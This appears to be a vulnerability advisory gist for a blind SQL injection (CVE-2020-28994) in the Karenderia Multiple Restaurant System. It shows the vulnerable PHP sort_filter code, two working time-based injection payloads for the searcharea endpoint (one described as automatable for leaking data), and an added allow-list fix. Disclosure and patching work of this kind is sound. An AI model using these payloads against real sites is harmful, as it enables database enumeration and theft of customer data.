
@wes4m
Last active November 24, 2020 02:18

Karenderia Multiple Restaurant System <=5.4.2 - SQLi Vuln.

CVE: CVE-2020-28994

Date: 21-11-2020

Exploit Author: wes4m

Vendor Homepage: buyer2@codemywebapps.com

Software Link:

https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694

Version: v5.4.2

Category: Web application.

Software Description:

The true and only #1 multiple restaurant system on codecanyon: Karenderia Multiple Restaurant System is a restaurant food ordering and restaurant membership system.

Affected function:

FunctionsV3::searchByMerchant

Injection point:

$sort_by = " ORDER BY is_sponsored DESC, restaurant_name ASC";
$sort_combine = $sort_by;

if (isset($getdata['sort_filter'])) {
    if (!empty($getdata['sort_filter'])) {
        $sort = "ASC";
        if ($getdata['sort_filter'] == "ratings") {
            $sort = "DESC";
        }
        // Injection point: the raw sort_filter value is concatenated into the ORDER BY clause.
        $sort_combine = " ORDER BY " . $getdata['sort_filter'] . " $sort";
    }
}

Vuln info

Blind SQL injection in all endpoints that allow sorting through the sort_filter parameter.
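A hardened replacement for the sort handling above, added here as an example and not Karenderia's own code: the user-supplied sort_filter value is only ever used as a lookup key into an allow-list, so it never reaches the SQL string. The allow-list keys are assumptions based on the column and value names visible in the snippet.

```php
<?php
// Added example (not the vendor's code): allow-list based sort handling.
// Column names in $allowedSort are assumptions taken from the snippet above.

function buildSortClause(array $getdata): string
{
    // Default ordering, identical to the original code.
    $default = " ORDER BY is_sponsored DESC, restaurant_name ASC";

    // Allow-list: key = accepted sort_filter value, value = the exact column
    // expression that is allowed to reach the query. Input is never concatenated.
    $allowedSort = [
        'restaurant_name' => 'restaurant_name',
        'ratings'         => 'ratings',
        'is_sponsored'    => 'is_sponsored',
    ];

    if (!isset($getdata['sort_filter']) || $getdata['sort_filter'] === '') {
        return $default;
    }

    $key = (string) $getdata['sort_filter'];
    if (!array_key_exists($key, $allowedSort)) {
        // Unknown value: fall back to the default rather than echoing the input.
        return $default;
    }

    // Direction is derived from the validated key, mirroring the original logic.
    $dir = ($key === 'ratings') ? 'DESC' : 'ASC';
    return " ORDER BY " . $allowedSort[$key] . " " . $dir;
}

// Constructed inputs: a legitimate sort, a value not on the allow-list, and no filter.
$cases = [
    ['sort_filter' => 'ratings'],              // -> " ORDER BY ratings DESC"
    ['sort_filter' => 'not_a_column; --'],     // -> default clause
    [],                                        // -> default clause
];
foreach ($cases as $c) {
    echo buildSortClause($c), PHP_EOL;
}
```

Requests carrying a sort_filter value that is not on the allow-list are also a useful signal to log at the web tier, since legitimate clients only ever send the listed keys.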

PoC:

searcharea?s=x&sort_filter=(CASE WHEN(SELECT count(*) FROM information_schema.tables WHERE table_name = 'COLUMNS')=1 THEN sleep(10) ELSE sleep(1) END)--&display_type=listview

Example leaking payload that can be automated:

searcharea?s=x&sort_filter=(CASE WHEN(SELECT count(*) FROM information_schema.tables WHERE table_name LIKE 'BRUTE_FORCE%')=1 THEN sleep(10) ELSE sleep(1) END)--&display_type=listview